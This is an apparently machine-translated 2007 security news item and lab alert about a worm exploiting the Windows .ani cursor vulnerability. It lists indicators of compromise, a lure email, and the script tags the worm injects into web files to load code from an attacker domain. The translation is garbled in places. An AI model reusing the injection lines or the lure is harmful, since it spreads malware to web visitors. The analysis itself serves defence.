The compound worm with the cursor vulnerability appeared in the Vista operating system and revealed the first major vulnerability.

The compound worm with the cursor vulnerability appeared in the Vista operating system and revealed the first major vulnerability.

On July 6, March 30, Microsoft Vista operating system revealed the first major vulnerability. Yesterday, Rising anti-virus experts found that the vulnerability has been exploited by hackers. users using Windows Vista and XP will be attacked by the virus and Trojan Horse (Trojan Horse scanning and removal software download) when accessing websites with viruses) and other virus infections. According to monitoring, nearly 10 websites in China have been attacked by hackers.

Microsoft has warned that attackers are actively exploiting an unrepaired vulnerability in the Windows animation cursor (. ani) file. This vulnerability affects Windows XP and later operating systems and browsers over IE6. Microsoft's latest Vista and IE7 are not spared. Microsoft has not released any patch for this vulnerability.

According to rising security experts, the ANI file is a Windows mouse dynamic cursor file. Because Vista and other systems have vulnerabilities in processing the ANI file, hackers can construct special formats of the ANI file, when a user browses a webpage containing the file, or clicks the file, the user automatically downloads viruses, Trojans, and Backdoor programs specified by the hacker. Among the viruses currently exploiting this vulnerability, the Worm. Viking variant and the trojan virus that steals online games account for the majority.

This is the first time that Vista has exposed a major vulnerability. The number of websites that exploit this vulnerability to spread viruses is gradually increasing, and the attack code is likely to be published.

Security experts advise ordinary Internet users not to easily log on to unfamiliar websites, especially those sent via email or chat software. Website administrators should strengthen the management of server logs. In particular, they should pay attention to images in formats such as ANI and JPG from unknown sources. Once exceptions occur, they should be processed as soon as possible.

------------------ C. I. S. R. T. Information ------------------

A very bad news is that the new worm exploiting the Microsoft animation cursor vulnerability has appeared. We have received related samples. Through analysis, we have confirmed that this is a compound worm that contains the infection function similar to pandatv, the function of downloading other viruses, and the latest sending. the ani vulnerability website email function, infected html files, and other files are added with the latest vulnerability URL function. Due to the high level of risk, CISRT Lab decided to release a moderate risk alert again, reminding the majority of users to be vigilant!

At the same time, we recommend that the majority of users and CEN shield the following two domain names and IP addresses:

2007ip.com
Microfsot.com
61.153.247.76

If the worm size is around 13 KB, the files will be released to the following directory:

% SYSTEM % \ sysload3.exe

Add the registry key value:

HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run
"System Boot Check" = "% SYSTEM % \ sysload3.exe"

Will send an email:

From: I _lov e_cq @ sohu. com
Subject: Who were you taken when you were playing the video? Laugh at you!
Body:
Look at your look! I think you are famous!
Look at this address! Your face is so clear! You have become a star!
Http://macr.micr of sot.com/<remove d>/134952.htm

Infect the. HTML. ASPX. HTM. PHP. JSP. ASP and. EXE files, and insert the following code into the. HTML. ASPX. HTM. PHP. JSP. ASP file:

<Script src = http://macr.microfsot.com/<removed>. js> </script>
Or
<Script language = "javascript" src = "http: // % 6D % 6 1% 63% 72% 2E % 6D % 69% 63% 72% 6F % 66% 73% 6F % 74% 2E % 63% 6F % 6D/<removed>. js "> </script>

Note that both the email and the web page contain malicious files with the. ani 0-day vulnerability.

Kaspersky detection for Trojan-Downloader.Win32.Agent.bky, drug overlord named Worm. MyInfect

Currently, the MD5 value of the received sample is

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
E9100ce97a5b4fbd8857b25ffe2d7179

First Update:

The author expressed dissatisfaction with Kaspersky In Worms